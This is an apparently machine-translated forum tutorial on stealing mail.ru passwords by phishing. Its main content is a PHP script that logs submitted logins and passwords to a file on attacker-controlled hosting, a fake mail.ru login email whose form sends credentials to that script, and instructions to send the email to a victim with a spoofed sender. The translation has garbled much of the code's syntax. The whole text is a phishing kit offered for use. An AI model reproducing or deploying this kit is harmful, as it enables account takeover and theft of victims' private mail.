Hacking mail on mail.ru [SI]

[::. INTRO. ::]

Hello! In this article I will talk about how to hack a mailbox on the free mail service mail.ru.

The article is intended for beginners, in the SI , as well as for any Internet user who wants to access someone else's account.

But okay, I will not write about this for a long time and it is clear "why a mailbox is necessary for a cracker, you will understand.

The article is suitable for beginners. Guru please do not read :)

[::. PREPARATION. ::]

For starters, we will need a free (better paid) hosting with PHP support .

* Only in advance make sure that the hosting supports PHP

You can register on any of these:

 Nextmail.ru 
 Hobby.ru 
 Webrise.ru 
 Lapin.ru 
 Free.dl-hosting.ru 
 Hostow.net 
 Beplaced.ru 
 777host.ru 
 Paltus.ru 
 Miraclehost.ru 
 Freebox.ru 
 Alfaspace.net 
 K70.ru 
 Hosting.promostudio.ru 
 Chat.ru 
 Maxhost.ru 
 Nixup.com 
 E2e.ru 
 Noka.ru 
 Newmail.ru 
 Boom.ru 
 H15.ru 
 Hut.ru 
 Jino-net.ru 
 Pochta.ru 
 Unlimhost.ru 
 Onepage.ru 
 By.ru 
 Sbn.bz 
 Yard.ru 
 Domainhosting.ru 
 Orthodoxy.ru 
 Webservis.ru 
 Ru-web.net 
 Activehost.ru 
 Househost.ru 
 Bestof.ru 
 Addr.ru 
 Hosting.dump.ru 
 Pesni.ru 
 Medbox.ru 
 Fatal.ru 
 X5x.ru 
 Hopshot.com 
 5gigs.com 
 Wagoo.com 
 Orgfree.com 
 Awardspace.com 
 Bobos.ca 
 Www.host.sk 
 Zportal.info 
 Spaceall.de 
 3x.ro 
 Sretenie.ru 
 Dotgeek.org 
 Sevhosting.net 
 O2g.net
 Www.jino-net.ru
 Www.nixup.com
 Newmail.ru
 Ho.com.ua
 WallSt.ru
 Hut.ru
 Holm.ru
 E2e.ru
 Fatal.ru
 Host.sk
 Ut.ru
 H1.ru
 Hostmos.ru
 Webm.ru
 Rdcom.ru
 Narod.ru
 Front.ru
 Nm.ru 
 Chat.ru 
 Boom.ru 
 By.ru

Registered? - go ahead!

What do we need?

First, we need a sniffer (this is a script that allows us to save the received data into a text file).


PHP Code:
  <? Php
 
  $ F = fopen ( "mail.txt" , "at" );
  # File where to save flock ( $ f , 2 );
  Fputs ( $ f , $ _GET [ 'Login' ]. "@" );
  # Login fputs ( $ f , $ _GET [ 'Domain' ]);
  # Domain fputs ( $ f , ";" . $ _GET [ 'Password' ]. "\ N" );
  # Password flock ( $ f , 3 );
  Fclose ( $ f );
  ?> <Script> document.location.href = "/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312"; </ script>

Consider the script in more detail.


PHP Code:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

This line defines the place where we will redirect the user after authorization on the letter-fake .

  • Save the file in mes.php and fill in the hosting.
  • Also, create the mail.txt file in the directory with the script, and put it on the right (chmod) 777.

Perhaps with hosting - all!

Let's proceed to the very letter that we will send to the victim on soap.


Code of the Letter:
  < Table class = readlet cellpadding = 0 cellspacing = 0 border = 0 width = "100%" > < tr >
 
  < Td id = aj_body >
 
  < Div id = let_body > < base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg" >
 
  < Table cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < Tr >
 
  < Td > The user sent you a hidden letter . <Br> To view the email, enter your login and password . <Br> </ a > </ p > </ td >
 
  </ Tr >
 
  </ Table > < font color = 00 ;
  33 ;
  66 FACE = "Arial" >
 
  < H4 > Authorization </ h4 >
 
  </ Font >
 
  < Table cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < Form method = "GET" action = "http: //Adressive /mes.php" >
 
  < Input type = "hidden" name = "mail" value = "1" >
 
  < Tr >
 
  < Td width = 75 >
 
  < Img src = http : //img.mail.ru/0.gif height = 1> <br> First name
 
  </ Td >
 
  < Td width = 150 >
 
  < Input type = "text" name = "Login" >
 
  </ Td >
 
  < Td width = 75 >
 
  < Select name = "Domain" >
 
  < Option value = "mail.ru" SELECTED > @ mail .
  En </ option >
 
  < Option value = "inbox.ru" > @ inbox .
  En </ option >
 
  < Option value = "list.ru" > @list.
  En </ option >
 
  < Option value = "bk.ru" > @ bk .
  En </ option >
 
  </ Select >
 
  </ Td >
 
  </ Tr >
 
  < Tr >
 
  < Td >
 
  Password
 
  </ Td >
 
  < Td >
 
  < Input type = "password" name = "Password" >
 
  </ Td >
 
  < Td >
 
  <A href = "http://www.mail.ru/pages/help/92.html" target = _new> Lost Password ? </ A >
 
  </ Td >
 
  </ Tr >
 
  < Tr >
 
  < Td > </ td >
 
  < Td >
 
  < Input type = checkbox name = "level" value = 1 id = "alien" > < label for = "alien" > Alien computer </ label >
 
  </ Td >
 
  < Td > </ td >
 
  </ Tr >
 
  < Tr >
 
  < Td > </ td >
 
  < Td >
 
  < Input type = "Submit" value = "Login" xstyle = "margin-top: 4px" >
 
  </ Td >
 
  < Td > </ td >
 
  </ Tr > </ form >
 
  </ Table > <br> <br>
 
  To learn more about services - visit <a href = "http://corp.mail.ru" target = "_blank"> Corp.
  Mail .
  Ru </ a > <br>
 
  National mail service <a href = "http://www.mail.ru" target = "_blank"> @ Mail .
  Ru </ a > - the best free mail .
 
  < Base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg" > </ div >
 
 

Specify in the action parameter the tag form - the address of your site (which you registered above) and the path to the sniffer mes.php .

[!] It is necessary to pay attention that the data should be passed by the method "GET"! Otherwise, nothing will come of it.

Now it remains to send the victim a letter , preferably with the substitution of the address .

We copy the code of the letter into the input field and send it in html format, having previously filled in the fields.

If the victim bites on it, then you are lucky :)

You can find out the passwords in the file mail.txt .

[::. END. ::]

I think everything.

And how to approach the burglary to solve for you.

Thank you for attention!

I await your feedback just below this text.

And it's better not to break anything;)

Goodbye and see you again :)